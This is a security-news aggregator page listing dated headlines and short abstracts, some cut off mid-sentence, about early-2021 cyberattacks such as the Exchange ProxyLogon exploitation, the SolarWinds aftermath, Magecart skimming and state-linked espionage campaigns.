The WFH reality resulted in an unprecedented change for organizations as they fought to defend exponentially greater attack surfaces from cybercriminals armed with powerful cloud-based tools.Help Net Security
March 17, 2021
Chinese Threat Actors Target Global 5G Operators Full Text
Abstract
Spoofed Huawei phishing page lures employeesInfosecurity Magazine
March 17, 2021
Researcher adds his fake package to Microsoft Azure SDK releases list Full Text
Abstract
A security researcher was able to add a counterfeit test package to the official list of Microsoft Azure SDK latest releases. The simple trick if abused by an attacker can give off the impression that their malicious package is part of the Azure SDK suite.BleepingComputer
March 17, 2021
SolarWinds hackers stole some of Mimecast source code Full Text
Abstract
Cybersecurity firm Mimecast confirmed that SolarWinds hackers who breached its network stole some of its source code. Back in December, the SolarWinds supply chain attack made the headlines when a Russian cyber espionage group tampered with updates...Security Affairs
March 17, 2021
Researcher adds their package to Microsoft Azure SDK releases list Full Text
Abstract
A security researcher was able to add their own test package to the official list of Microsoft Azure SDK latest releases. The simple trick if abused by an attacker can give off the impression that their malicious package is part of the Azure SDK suite.BleepingComputer
March 16, 2021
Magecart hackers hide captured credit card data in JPG file Full Text
Abstract
Crooks devised a new method to hide credit card data siphoned from compromised e-stores, experts observed hackers hiding data in JPG files. Cybercriminals have devised a new method to hide credit card data siphoned from compromised online stores,...Security Affairs
March 16, 2021
Magecart Attackers Save Stolen Credit-Card Data in .JPG File Full Text
Abstract
Researchers from Sucuri discovered the tactic, which creatively hides malicious activity until the info can be retrieved, during an investigation into a compromised Magento 2 e-commerce site.Threatpost
March 16, 2021
Hackers hide credit card data from compromised stores in JPG file Full Text
Abstract
Hackers have come up with a sneaky method to steal payment card data from compromised online stores that reduces the suspicious traffic footprint and helps them evade detection.BleepingComputer
March 15, 2021
Hackers hit 32 Indian firms via Microsoft email servers Full Text
Abstract
The hardest-hit sectors in India are finance and banking institutions (28%), government/military organizations (16%), manufacturing (12.5%), insurance/legal (9.5%), and others (34%), according to CPR.The Times Of India
March 12, 2021
This Financially-Motivated Actor has Targeted Countless Industrial Organizations Full Text
Abstract
Security analysts uncovered an attack campaign targeting oil and gas supply chain industries in Europe, the Middle East, Asia Pacific, and North America using spearphishing techniques.Cyware Alerts - Hacker News
March 12, 2021
Researchers hacked Indian govt sites via exposed git and env files Full Text
Abstract
Researchers have now disclosed more information on how they were able to breach multiple websites of the Indian government. The full findings disclosed today shed light on the routes leveraged by the researchers, including finding exposed .git directories and .env files on some of these systems.BleepingComputer
March 11, 2021
Threat actors bypassing shoddy patching, targeting network gateways Full Text
Abstract
Patch bypasses and network pivot vulnerabilities are becoming more common tools in the box of threat actors, according to new research.SCMagazine
March 11, 2021
Hackers stole data from Norway parliament exploiting Microsoft Exchange flaws Full Text
Abstract
Norway's parliament, the Storting, has suffered a new cyberattack; hackers stole data by exploiting recently disclosed Microsoft Exchange vulnerabilities. Norway's parliament, the Storting, was hit by a new cyberattack, threat actors stole data exploiting...Security Affairs
March 10, 2021
White hat hackers gained access to more than 150,000 surveillance cameras Full Text
Abstract
A group of hackers claimed to have compromised more than 150,000 surveillance cameras at banks, jails, schools, and prominent companies like Tesla and Equinox. A group of US hackers claimed to have gained access to footage from 150,000 security cameras...Security Affairs
March 10, 2021
Malicious Actors Target Crypto Wallets of Coinbase Users in New… Full Text
Abstract
Cybercriminals are targeting Coinbase platform users with phishing campaigns in an attempt to steal their account credentials and drain their cryptocurrency wallets, Bitdefender reported.Bit Defender
March 10, 2021
Cyberattackers Exploiting Critical WordPress Plugin Bug Full Text
Abstract
The security hole in the Plus Addons for Elementor plugin was used in active zero-day attacks prior to a patch being issued.Threatpost
March 10, 2021
SolarWinds Unlikely to Be an Isolated Event as Attackers Become More Sophisticated Full Text
Abstract
Pandemic has allowed malicious actors to industrializeInfosecurity Magazine
March 10, 2021
More hacking groups join Microsoft Exchange attack frenzy Full Text
Abstract
More state-sponsored hacking groups have joined the ongoing attacks targeting tens of thousands of on-premises Exchange servers impacted by severe vulnerabilities tracked as ProxyLogon.BleepingComputer
March 9, 2021
Chinese linked to two attacks on internet-facing SolarWinds server Full Text
Abstract
On Monday, researchers attributed two 2020 intrusions into a SolarWinds Orion server to the Chinese espionage group Spiral; the intrusions were linked to each other but not to the infamous SolarWinds attack attributed to Russia.SCMagazine
March 09, 2021
Hackers access surveillance cameras at Tesla, Cloudflare, banks, more Full Text
Abstract
Hackers gained access to live surveillance cameras installed at Tesla, Equinox, healthcare clinics, jails, and banks, including the Bank of Utah.BleepingComputer
March 09, 2021
Security bug hunters focus on misconfigured services, earn big rewards Full Text
Abstract
An overview of the hacking activity on the HackerOne vulnerability coordination and bug bounty platform shows that misconfiguration of cloud resources is quickly becoming a hot target for ethical hackers.BleepingComputer
March 09, 2021
SolarWinds Hack — New Evidence Suggests Potential Links to Chinese Hackers Full Text
Abstract
A malicious web shell deployed on Windows systems by leveraging a previously undisclosed zero-day in SolarWinds' Orion network monitoring software may have been the work of a possible Chinese threat group. In a report published by Secureworks on Monday, the cybersecurity firm attributed the intrusions to a threat actor it calls Spiral. Back on December 22, 2020, Microsoft disclosed that a second espionage group may have been abusing the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on target systems. The findings were also corroborated by cybersecurity firms Palo Alto Networks' Unit 42 threat intelligence team and GuidePoint Security , both of whom described Supernova as a .NET web shell implemented by modifying an "app_web_logoimagehandler.ashx.b6031896.dll" module of the SolarWinds Orion application. The alterations were made possible not by breaching the SolarWinds app update infrastructure but instead bThe Hacker News
March 8, 2021
Hackers Target Texas University Full Text
Abstract
Malicious intrusion causes network outage at the University of Texas at El PasoInfosecurity Magazine
March 08, 2021
Iranian Hackers Using Remote Utilities Software to Spy On Its Targets Full Text
Abstract
Hackers with suspected ties to Iran are actively targeting academia, government agencies, and tourism entities in the Middle East and neighboring regions as part of an espionage campaign aimed at data theft. Dubbed "Earth Vetala" by Trend Micro, the latest finding expands on previous research published by Anomali last month, which found evidence of malicious activity aimed at UAE and Kuwait government agencies by exploiting ScreenConnect remote management tool. The cybersecurity firm linked the ongoing attacks with moderate confidence to a threat actor widely tracked as MuddyWater , an Iranian hacker group known for its offensives primarily against Middle Eastern nations. Earth Vetala is said to have leveraged spear-phishing emails containing embedded links to a popular file-sharing service called Onehub to distribute malware that ranged from password dumping utilities to custom backdoors, before initiating communications with a command-and-control (C2) server to exeThe Hacker News
March 8, 2021
Hackers compromised Microsoft Exchange servers at the EU Banking Regulator EBA Full Text
Abstract
The European Banking Authority (EBA) disclosed a cyberattack that resulted in the hack of its Microsoft Exchange email system. The European Banking Authority announced that it was the victim of a cyber attack against its email system that exploited...Security Affairs
March 8, 2021
The launch of Williams' new FW43B car ruined by hackers Full Text
Abstract
The presentation of Williams' new Formula One car was ruined by hackers, forcing the team to abandon the launch, which was to take place through an augmented reality app. The Williams team presented its new Formula One car on Friday, but hackers partially ruined the launch...Security Affairs
March 7, 2021
Chinese hackers allegedly hit thousands of organizations using Microsoft Exchange Full Text
Abstract
Thousands of organizations may have been victims of cyberattacks on Microsoft Exchange servers conducted by China-linked threat actors since January. At least tens of thousands of Microsoft customers may have been hacked by allegedly China-linked...Security Affairs
March 5, 2021
Chinese hackers might have targeted Indian Railways infrastructure Full Text
Abstract
Besides 10 organizations in the Indian power sector and two ports, Chinese state-sponsored hackers might also have targeted Indian Railways infrastructure, an expert with cyber intelligence company Recorded Future said on Thursday.The Times Of India
March 5, 2021
Hackers Target Russian Cybercrime Forums Full Text
Abstract
Maza becomes latest Russian cybercrime forum to be hackedInfosecurity Magazine
March 5, 2021
Multiple Cyberspy Groups Target Microsoft Exchange Servers via Zero-Day Flaws Full Text
Abstract
ESET researchers revealed that, while most of the targets are located in the United States, attacks against servers in Europe, Asia, and the Middle East have been identified as well.Security Week
March 04, 2021
FireEye finds evidence Chinese hackers exploited Microsoft email app flaw since January Full Text
Abstract
Cybersecurity group FireEye on Thursday night announced it had found evidence that hackers had exploited a flaw in a popular Microsoft email application since as early as January to target groups across a variety of sectors.The Hill
March 4, 2021
Cyberattackers Target Top Russian Cybercrime Forums Full Text
Abstract
Elite Russian forums for cybercriminals have been hacked in a string of breaches, leaving hackers edgy and worried about law enforcement.Threatpost
March 4, 2021
North Korea and Cybercrime - A Malicious Combination Full Text
Abstract
It can be unarguably stated that North Korea and cybercrime go hand in hand. The nation is highly focused on reinforcing its cyber capabilities, by all means necessary, and creating more than just a nuisance.Cyware Alerts - Hacker News
March 04, 2021
Researcher bitsquats Microsoft’s windows.com to steal traffic Full Text
Abstract
A researcher was able to bitsquat Microsoft's windows.com domain by cybersquatting variations of windows.com. Adversaries can abuse this tactic to conduct automated attacks or collect data due to the nature of bit flipping.BleepingComputer
March 3, 2021
Hackers, nation-states, target US black community to commit fraud, sow division Full Text
Abstract
African Americans are more highly impacted by fraud campaigns compared to other racial and ethnic groups, as disparities in financial literacy and wealth act as barriers to recovery from any resulting financial loss.SCMagazine
March 03, 2021
Hackers share methods to bypass 3D Secure for payment cards Full Text
Abstract
Cybercriminals are constantly exploring and documenting new ways to go around the 3D Secure (3DS) protocol used for authorizing online card transactions.BleepingComputer
March 03, 2021
State hackers rush to exploit unpatched Microsoft Exchange servers Full Text
Abstract
Multiple state-sponsored hacking groups are actively exploiting critical Exchange bugs Microsoft patched Tuesday via emergency out-of-band security updates.BleepingComputer
March 03, 2021
Hackers Now Hiding ObliqueRAT Payload in Images to Evade Detection Full Text
Abstract
Cybercriminals are now deploying remote access Trojans (RATs) under the guise of seemingly innocuous images hosted on infected websites, once again highlighting how threat actors quickly change tactics when their attack methods are discovered and exposed publicly. New research released by Cisco Talos reveals a new malware campaign targeting organizations in South Asia that utilize malicious Microsoft Office documents forged with macros to spread a RAT that goes by the name of ObliqueRAT . First documented in February 2020 , the malware has been linked to a threat actor tracked as Transparent Tribe (aka Operation C-Major, Mythic Leopard, or APT36), a highly prolific group allegedly of Pakistani origin known for its attacks against human rights activists in the country as well as military and government personnel in India. While the ObliqueRAT modus operandi previously overlapped with another Transparent Tribe campaign in December 2019 to disseminate CrimsonRAT, the new wave ofThe Hacker News
March 3, 2021
Threat Actor HAFNIUM Found Targeting Exchange Servers with Zero-Day Exploits Full Text
Abstract
Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics, and procedures.Microsoft
March 2, 2021
Medal of Honor Holders’ Identities Stolen Full Text
Abstract
Hacker stole heroes’ identities and used them to buy goods on American military exchangesInfosecurity Magazine
March 2, 2021
Chinese hackers target Indian vaccine makers SII, Bharat Biotech, says security firm Full Text
Abstract
A Chinese state-backed hacking group has in recent weeks targeted the IT systems of two Indian vaccine makers whose coronavirus shots are being used in the country, Cyfirma told Reuters.Reuters
March 2, 2021
How Apple’s locked down security gives extra protection to the best hackers Full Text
Abstract
When the most advanced hackers do succeed in breaking in, something strange happens: Apple’s extraordinary defenses end up protecting the attackers themselves instead of keeping them out.Technology Review
March 1, 2021
China’s new cyber tactic: targeting critical infrastructure Full Text
Abstract
Amid tensions along their border, the new RedEcho group is breaching power infrastructure in India.SCMagazine
March 1, 2021
Chinese Hacker Group Targets Indian Power Sector & critical infrastructure Amid Border Tensions Full Text
Abstract
Recently, a Chinese state-sponsored hacker group, RedEcho has targeted the Indian power sector and critical infrastructure amid border tensions in an effort...Cyber Security News
March 1, 2021
A new tactic for Chinese cyber actors: threatening critical infrastructure Full Text
Abstract
Amid tensions along their border, the new RedEcho group is breaching power infrastructure in India.SCMagazine
March 1, 2021
10 Indian Power Generation and Transmission Entities Targeted by Chinese Hackers Amid Geopolitical Tensions Full Text
Abstract
A new study shows that as the standoff continued in the Himalayas between India and China, Chinese malware was flowing into the control systems that manage electric supply across India.New York Times
March 01, 2021
Chinese Hackers Targeted India’s Power Grid Amid Geopolitical Tensions Full Text
Abstract
Amid heightened border tensions between India and China, cybersecurity researchers have revealed a concerted campaign against India's critical infrastructure, including the nation's power grid, from Chinese state-sponsored groups. The attacks, which coincided with the standoff between the two nations in May 2020, targeted a total of 12 organizations, 10 of which are in the power generation and transmission sector. "10 distinct Indian power sector organizations, including four of the five Regional Load Despatch Centres (RLDC) responsible for operation of the power grid through balancing electricity supply and demand, have been identified as targets in a concerted campaign against India's critical infrastructure," Recorded Future said in a report published yesterday. "Other targets identified included 2 Indian seaports." Chief among the victims include a power plant run by National Thermal Power Corporation (NTPC) Limited and New Delhi-based PowerThe Hacker News
February 27, 2021
Hotarus Corp gang hacked Ecuador’s Ministry of Finance and Banco Pichincha Full Text
Abstract
'Hotarus Corp' ransomware operators hacked Ecuador's largest private bank, Banco Pichincha, and the country's Ministry of Finance. A cybercrime group called 'Hotarus Corp' has breached Ecuador's largest private bank, Banco Pichincha, and the local...Security Affairs
February 26, 2021
North Korean Hackers Targeting Defense Firms with ThreatNeedle Malware Full Text
Abstract
A prolific North Korean state-sponsored hacking group has been tied to a new ongoing espionage campaign aimed at exfiltrating sensitive information from organizations in the defense industry. Attributing the attacks with high confidence to the Lazarus Group , the new findings from Kaspersky signal an expansion of the APT actor's tactics by going beyond the usual gamut of financially-motivated crimes to fund the cash-strapped regime. This broadening of its strategic interests happened in early 2020 by leveraging a tool called ThreatNeedle , researchers Vyacheslav Kopeytsev and Seongsu Park said in a Thursday write-up. At a high level, the campaign leverages a multi-step approach that begins with a carefully crafted spear-phishing attack leading eventually to the attackers gaining remote control over the devices. ThreatNeedle is delivered to targets via COVID-themed emails with malicious Microsoft Word attachments as initial infection vectors that, when opened, run a macro coThe Hacker News
February 26, 2021
Hackers are selling access to Biochemical systems at Oxford University Lab Full Text
Abstract
Hackers have broken into the biochemical systems of an Oxford University lab where researchers are working on the study of Covid-19. Hackers compromised the systems at one of the most advanced biology labs at Oxford University, which is involved...Security Affairs
February 26, 2021
Chinese Hackers Target Tibetans with Malicious Firefox Extension Full Text
Abstract
FriarFox allows intruders to monitor emails and browser dataInfosecurity Magazine
February 26, 2021
These four new hacking groups are targeting critical infrastructure, warns security company Full Text
Abstract
According to cybersecurity researchers at Dragos, four new hacking groups, dubbed Stibnite, Talonite, Kamacite, and Vanadinite, targeting industrial systems have been detected over the past year.ZDNet
February 26, 2021
China-linked TA413 group targets Tibetan organizations Full Text
Abstract
The Chinese hacking group, tracked as TA413, used a malicious Firefox add-on in a cyberespionage campaign aimed at Tibetans. China-linked cyberespionage group TA413 targeted Tibetan organizations across the world using a malicious Firefox add-on,...Security Affairs
February 25, 2021
Hackers Abusing Google Apps Script Full Text
Abstract
Attackers are exploiting the Google App Script domain—script.google.com—to evade Content Security Policy (CSP) controls and malware scan engines.Cyware Alerts - Hacker News
February 25, 2021
North Korean hackers target defense industry with custom malware Full Text
Abstract
A North Korean-backed hacking group has targeted the defense industry with custom backdoor malware dubbed ThreatNeedle since early 2020 with the end goal of collecting highly sensitive information.BleepingComputer
February 25, 2021
Russian Hackers Targeted Ukraine Authorities With Supply-Chain Malware Attack Full Text
Abstract
Ukraine is formally pointing fingers at Russian hackers for hacking into one of its government systems and attempting to plant and distribute malicious documents that would install malware on target systems of public authorities. "The purpose of the attack was the mass contamination of information resources of public authorities, as this system is used for the circulation of documents in most public authorities," the National Security and Defense Council of Ukraine (NSDC) said in a statement published on Wednesday. The NSDC's National Coordination Center for Cybersecurity (NCCC) termed it a supply chain attack aimed at the System of Electronic Interaction of Executive Bodies (SEI EB), which is used to distribute documents to officials. Calling it a work of threat actors with ties to Russia, the NSDC said the malicious documents came embedded with a macro that, when opened, stealthily downloaded malicious code to control the compromised system remotely. "The mThe Hacker News
February 24, 2021
Hackers have eye on 6 Bangladeshi organisations Full Text
Abstract
Kasablanca, a hacker group, has launched cyberattacks on at least six well-known Bangladeshi financial and government organizations, says the e-Government Computer Incident Response Team (e-Gov CIRT).Dhaka Tribune
February 24, 2021
Russian hackers linked to attack targeting Ukrainian government Full Text
Abstract
The National Security and Defense Council of Ukraine (NSDC) has linked Russian-backed hackers to attempts to compromise state agencies after breaching the government's document management system.BleepingComputer
February 24, 2021
LazyScripter hackers target airlines with remote access trojans Full Text
Abstract
Security researchers analyzing multiple sets of malicious emails believe they uncovered activity belonging to a previously unidentified actor that fits the description of an advanced persistent threat (APT).BleepingComputer
February 24, 2021
New hacker group targets airlines, refugees with well-worn tools Full Text
Abstract
The group used job and IATA related lures, as well as fake updates; immigration, tourism and visa related documents; and COVID-19 information to infect victims.SCMagazine
February 23, 2021
Twitter removes accounts of Russian government-backed actors Full Text
Abstract
Twitter has removed dozens of accounts connected to Russian government-backed actors disseminating disinformation and targeting the European Union, the United States, and the NATO alliance.BleepingComputer
February 23, 2021
Hackers Can Bypass Mastercard PIN by Using It as a Visa Card Full Text
Abstract
Cybersecurity researchers have recently identified an attack that could enable threat actors to trick a point-of-sale...Cyber Security News
February 22, 2021
Hackers Exploit Accellion Zero-Days in Recent Data Theft and Extortion Attacks Full Text
Abstract
Cybersecurity researchers on Monday tied a string of attacks targeting Accellion File Transfer Appliance (FTA) servers over the past two months to data theft and extortion campaign orchestrated by a cybercrime group called UNC2546 . The attacks, which began in mid-December 2020, involved exploiting multiple zero-day vulnerabilities in the legacy FTA software to install a new web shell named DEWMODE on victim networks and exfiltrating sensitive data, which was then published on a data leak website operated by the CLOP ransomware gang. But in a twist, no ransomware was actually deployed in any of the recent incidents that hit organizations in the U.S., Singapore, Canada, and the Netherlands, with the actors instead resorting to extortion emails to threaten victims into paying bitcoin ransoms. According to Risky Business , some of the companies that have had their data listed on the site include Singapore's telecom provider SingTel , the American Bureau of Shipping, law firmThe Hacker News
February 22, 2021
Chinese Hackers Hijacked NSA-Linked Hacking Tool: Report Full Text
Abstract
APT31, a Chinese-affiliated threat group, copied a Microsoft Windows exploit previously used by the Equation Group, said researchers.Threatpost
February 22, 2021
Chinese hackers used NSA exploit years before Shadow Brokers leak Full Text
Abstract
Chinese state hackers cloned and started using an NSA zero-day exploit almost three years before the Shadow Brokers hacker group publicly leaked it in April 2017.BleepingComputer
February 22, 2021
NSA Equation Group tool was used by Chinese hackers years before it was leaked online Full Text
Abstract
The Chinese APT group had access to an NSA Equation Group hacking tool and used it for years before it was leaked online by the Shadow Brokers group. The Check Point Research team discovered that the China-linked APT31 group (aka Zirconium) used a tool dubbed...Security Affairs
February 22, 2021
An attacker was able to siphon audio feeds from multiple Clubhouse rooms Full Text
Abstract
An attacker demonstrated this week that Clubhouse chats are not secure: he was able to siphon audio feeds from "multiple rooms" into his own website. While the popularity of the audio chatroom app Clubhouse continues to increase, experts are questioning...Security Affairs
February 22, 2021
Chinese Shadow Brokers Hacking Group Copied Windows Zero-Day Exploit Belonging to NSA’s Equation Group Full Text
Abstract
Chinese threat actors "cloned" and used a Windows zero-day exploit stolen from the NSA's Equation Group for years before the privilege escalation flaw was patched, researchers say.ZDNet
February 22, 2021
Chinese Hackers Had Access to a U.S. Hacking Tool Years Before It Was Leaked Online Full Text
Abstract
On August 13, 2016, a hacking unit calling itself " The Shadow Brokers " announced that it had stolen malware tools and exploits used by the Equation Group, a sophisticated threat actor believed to be affiliated to the Tailored Access Operations (TAO) unit of the U.S. National Security Agency (NSA). Although the group has since signed off following the unprecedented disclosures, new "conclusive" evidence unearthed by Check Point Research shows that this was not an isolated incident. The previously undocumented cyber-theft took place more than two years before the Shadow Brokers episode, the American-Israeli cybersecurity company said in an exhaustive report published today, resulting in U.S.-developed cyber tools reaching the hands of a Chinese advanced persistent threat which then repurposed them in order to attack U.S. targets. "The caught-in-the-wild exploit of CVE-2017-0005, a zero-day attributed by Microsoft to the Chinese APT31 (aka Zirconium), isThe Hacker News
February 21, 2021
Experts warn of threat actors abusing Google Alerts to deliver unwanted programs Full Text
Abstract
Experts warn of threat actors using Google Alerts to promote a fake Adobe Flash Player updater that delivers unwanted programs. Experts from BleepingComputer are warning of threat actors that are using Google Alerts to promote a fake Adobe Flash Player...Security Affairs
February 21, 2021
RDP Attackers Have Made Themselves at Home Full Text
Abstract
We all know that the attack surface has expanded because of the sudden shift to work from home, and now, this has given a boost to Remote Desktop Protocol (RDP) attacks.Cyware Alerts - Hacker News
February 21, 2021
Bug bounty hacker earned $5,000 reporting a Stored XSS flaw in iCloud.com Full Text
Abstract
A white hat hacker has earned a $5,000 reward from Apple for reporting a stored cross-site scripting (XSS) vulnerability on iCloud.com. The bug bounty hunter Vishal Bharad has earned a $5,000 reward from Apple for reporting a stored cross-site scripting...Security Affairs
February 19, 2021
SolarWinds Attackers Breached 100+ Private Firms Full Text
Abstract
White House briefing reveals extent of attack on tech industryInfosecurity Magazine
February 19, 2021
Hackers steal credit card data abusing Google’s Apps Script Full Text
Abstract
Attackers are abusing Google's Apps Script business application development platform to steal payment card information from e-stores. Sansec researchers reported that threat...Security Affairs
February 18, 2021
SolarWinds Hackers Stole Some Source Code for Microsoft Azure, Exchange, Intune Full Text
Abstract
Microsoft, on Thursday, said it concluded its probe into the SolarWinds hack, finding that the attackers stole some source code but confirmed there's no evidence that they abused its internal systems to target other companies or gained access to production services or customer data. The disclosure builds upon an earlier update on December 31, 2020, that uncovered a compromise of its own network to view source code related to its products and services. "We detected unusual activity with a small number of internal accounts and upon review, we discovered one account had been used to view source code in a number of source code repositories," the Windows maker had previously disclosed. "The account did not have permissions to modify any code or engineering systems and our investigation further confirmed no changes were made. These accounts were investigated and remediated." Now, according to the company, besides viewing a few individual files by searching throThe Hacker News
February 18, 2021
Microsoft: SolarWinds hackers downloaded some Azure, Exchange source code Full Text
Abstract
Microsoft announced today that the SolarWinds hackers could gain access to source code for a limited amount of components used by Azure, Intune, and Exchange.BleepingComputer
February 18, 2021
SolarWinds hackers had access to components used by Azure, Intune, and Exchange Full Text
Abstract
Microsoft announced that SolarWinds hackers could have had access to repositories containing some components used by Azure, Intune, and Exchange. Microsoft announced that the threat actors behind the SolarWinds supply chain attack could have had access...Security Affairs
February 18, 2021
Hackers abuse Google Apps Script to steal credit cards, bypass CSP Full Text
Abstract
Attackers are abusing Google's Apps Script business application development platform to steal credit card information submitted by customers of e-commerce websites while shopping online.BleepingComputer
February 18, 2021
Hackers target Myanmar government websites in coup protest Full Text
Abstract
Hackers attacked military-run government websites in Myanmar on Thursday (Feb 18) as a cyber war erupted after authorities shut down the Internet for a fourth straight night.Channel News Asia
February 18, 2021
Microsoft: SolarWinds hackers downloaded Azure, Exchange source code Full Text
Abstract
Microsoft announced today that the SolarWinds hackers could gain access to source code for a limited amount of components used by Azure, Intune, and Exchange.BleepingComputer
February 17, 2021
Hackers are Playing No Games: CD Projekt Edition Full Text
Abstract
CD Projekt Red, the Polish gaming firm, announced being hit by a ransomware attack affecting its network. The group responsible for the attack goes by the name of HelloKitty.Cyware Alerts - Hacker News
February 17, 2021
Russian Sandworm hackers only hit orgs with old Centreon software Full Text
Abstract
Centreon, the maker of the IT monitoring software exploited by Russian state hackers to infiltrate French companies' networks, said today that only organizations using obsolete software were compromised.BleepingComputer
February 17, 2021
Researchers Unmask Hackers Behind APOMacroSploit Malware Builder Full Text
Abstract
Cybersecurity researchers have disclosed a new kind of Office malware distributed as part of a malicious email campaign that targeted more than 80 customers worldwide in an attempt to control victim machines and steal information remotely. The tool — dubbed " APOMacroSploit " — is a macro exploit generator that allows the user to create an Excel document capable of bypassing antivirus software, Windows Antimalware Scan Interface (AMSI), and even Gmail and other email-based phishing detection. APOMacroSploit is believed to be the work of two French-based threat actors "Apocaliptique" and "Nitrix," who are estimated to have made at least $5000 in less than two months selling the product on HackForums.net. About 40 hackers in total are said to be behind the operation, utilizing 100 different email senders in a slew of attacks targeting users in more than 30 different countries. The attacks were spotted for the first time at the end of November 2020, accoThe Hacker News
February 16, 2021
Hacker claims to have stolen files from law firm tied to Trump: WSJ Full Text
Abstract
A hacker is claiming to have stolen files from prominent law firm Jones Day, The Wall Street Journal reported on Tuesday.The Hill
February 16, 2021
South Korea claims North Koreans hacked Pfizer for COVID-19 vaccine data Full Text
Abstract
The report comes after attempts late last year by suspected North Korean hackers to steal data from at least nine healthcare companies, such as Johnson & Johnson, Novavax and AstraZeneca.SCMagazine
February 16, 2021
Threat Actors Unite Against Healthcare Sector Full Text
Abstract
As if double extortion was not enough, the triple extortion tactic is here to be the next nightmare, especially for the healthcare sector.Cyware Alerts - Hacker News
February 16, 2021
North Korean hackers targeted Pfizer coronavirus vaccine: report Full Text
Abstract
North Korean hackers were recently involved in targeting and attempting to steal information on Pfizer’s COVID-19 vaccine, The Washington Post reported Tuesday.The Hill
February 16, 2021
North Korea ‘Tried to Hack’ Pfizer for Vaccine Info - South’s Spies: Reports Full Text
Abstract
North Korean hackers tried to break into the systems of Pfizer in a search for information on a COVID-19 vaccine and treatment technology, South Korea's spy agency said Tuesday, according to reports.Security Week
February 16, 2021
Why Threat Actors Continue to Rely on Cyber Fraud Full Text
Abstract
While 2020 is gone, cyber fraud problems will continue in 2021. Cybercriminals will focus on maximizing their profits, using a traditional cost-benefit analysis to decide on the best attack vector.Fortinet
February 16, 2021
Microsoft: 1000+ Hackers Worked on SolarWinds Campaign Full Text
Abstract
Russian-backed cyber-espionage operation is “largest” world has seenInfosecurity Magazine
February 15, 2021
Hackers Exploit IT Monitoring Tool Centreon to Target Several French Entities Full Text
Abstract
Russia-linked state-sponsored threat actor known as Sandworm has been linked to a three-year-long stealthy operation to hack targets by exploiting an IT monitoring tool called Centreon . The intrusion campaign — which breached "several French entities" — is said to have started in late 2017 and lasted until 2020, with the attacks particularly impacting web-hosting providers, said the French information security agency ANSSI in an advisory. "On compromised systems, ANSSI discovered the presence of a backdoor in the form of a webshell dropped on several Centreon servers exposed to the internet," the agency said on Monday. "This backdoor was identified as being the PAS webshell, version number 3.1.4. On the same servers, ANSSI found another backdoor identical to one described by ESET and named Exaramel." The Russian hacker group (also called APT28, TeleBots, Voodoo Bear, or Iron Viking) is said to be behind some of the most devastating cyberattacks in pThe Hacker News
February 15, 2021
France links Russian Sandworm hackers to hosting provider attacks Full Text
Abstract
The French national cyber-security agency has linked a series of attacks that resulted in the breach of multiple French IT providers over a span of four years to the Russian-backed Sandworm hacking group.BleepingComputer
February 15, 2021
Hackers Not Relinquishing Attacks on Medical Sector, Not Yet Full Text
Abstract
Healthcare organizations are still struggling to keep their patients' confidential data out of the reach of hackers, especially in the era of COVID-19.Cyware Alerts - Hacker News
February 14, 2021
Pro-India hackers use Android spyware to spy on Pakistani military Full Text
Abstract
This week a report has revealed details on the two spyware strains leveraged by state-sponsored threat actors during the India-Pakistan conflict. The malware strains named Hornbill and SunBird have been delivered as fake Android apps (APKs) by the Confucius advanced persistent threat group (APT), a state-sponsored operation.BleepingComputer
February 13, 2021
Windows Users Face Another Wave of Cyber Threats Full Text
Abstract
Threat actors continue to upgrade their attack arsenal. Now, researchers reported a cyberespionage campaign using the new LodaRAT to spy on Android and Windows users in Bangladesh.Cyware Alerts - Hacker News
February 13, 2021
Iranian MuddyWater Hacker Group Utilizing ScreenConnect for Nefarious Purposes Full Text
Abstract
An Iranian APT masquerading as the Ministry of Foreign Affairs of Kuwait and the UAE National Council is using a remote management tool called ConnectWise Control in a cyberespionage campaign.Cyware Alerts - Hacker News
February 12, 2021
Dark Web Forums Have Become a Picnic Spot for Hackers Full Text
Abstract
The dark web is proving to be a serious menace for organizations and the threats keep on piling up with the huge amount of data dumped on it on a regular basis.Cyware Alerts - Hacker News
February 12, 2021
Hackers Getting Used to Automated Tools to Target Webapps Full Text
Abstract
According to a recent report, cybercriminals are now actively adopting automation tools and bots to target web applications. Sometimes, bots would impersonate Google bots to evade a system's defensive mechanism.Cyware Alerts - Hacker News
February 12, 2021
Hackers Claim to Sell 40 Million User Records From Largest Commercial Bank in Ukraine Full Text
Abstract
The database is said to contain customers’ full names, birthdates, taxpayer identification number (TIN), birthplace, passport details, family status, car availability, education, phone number, etc.Cyber News
February 12, 2021
Food-delivery fraudsters deploy hacked accounts, stolen credit card info to skim from orders Full Text
Abstract
Taking advantage of the increased demand for food delivery, fraudsters advertise in Telegram forums that they can illicitly buy food orders at steep discounts, around 60%-75% off.Cyberscoop
February 12, 2021
Hacker Sriki stole data from Adani Power PCs, say police Full Text
Abstract
Latest police investigation revealed G Srikrishna alias Sriki, 24, the alleged hacker from Bengaluru, had hacked into the office computers of Udupi Power Corporation Ltd owned by Adani Power.The Times Of India
February 11, 2021
Domestic Kitten is Actively Surveilling Enemies of the Iranian State Full Text
Abstract
Check Point researchers discovered a group of Iranian hackers targeting more than 1,000 dissidents worldwide in two-of-a-kind surveillance operations in at least four attack campaigns.Cyware Alerts - Hacker News
February 11, 2021
Hackers ask only $1,500 for access to breached company networks Full Text
Abstract
The number of offers for network access and their median prices on the public face of hacker forums dropped in the final quarter of last year but the statistics fail to reflect the real size of the initial access market.BleepingComputer
February 11, 2021
Network hackers asked for over $1 million in initial access offers Full Text
Abstract
The number of offers for network access and their median prices on the public face of hacker forums dropped in the final quarter of last year but the statistics fail to reflect the real size of the initial access market.BleepingComputer
February 10, 2021
Iranian Hackers Utilize ScreenConnect to Spy On UAE, Kuwait Government Agencies Full Text
Abstract
UAE and Kuwait government agencies are targets of a new cyberespionage campaign potentially carried out by Iranian threat actors, according to new research. Attributing the operation to be the work of Static Kitten (aka MERCURY or MuddyWater), Anomali said the "objective of this activity is to install a remote management tool called ScreenConnect (acquired by ConnectWise 2015) with unique launch parameters that have custom properties," with malware samples and URLs masquerading as the Ministry of Foreign Affairs (MOFA) of Kuwait and the UAE National Council. Since its origins in 2017, MuddyWater has been tied to a number of attacks primarily against Middle Eastern nations, actively exploiting the Zerologon vulnerability in real-world attack campaigns to strike prominent Israeli organizations with malicious payloads. The state-sponsored hacking group is believed to be working at the behest of Iran's Islamic Republic Guard Corps, the country's primary intellig... The Hacker News
February 10, 2021
Sprite Spider: Another Threat Actor to Be Aware of Full Text
Abstract
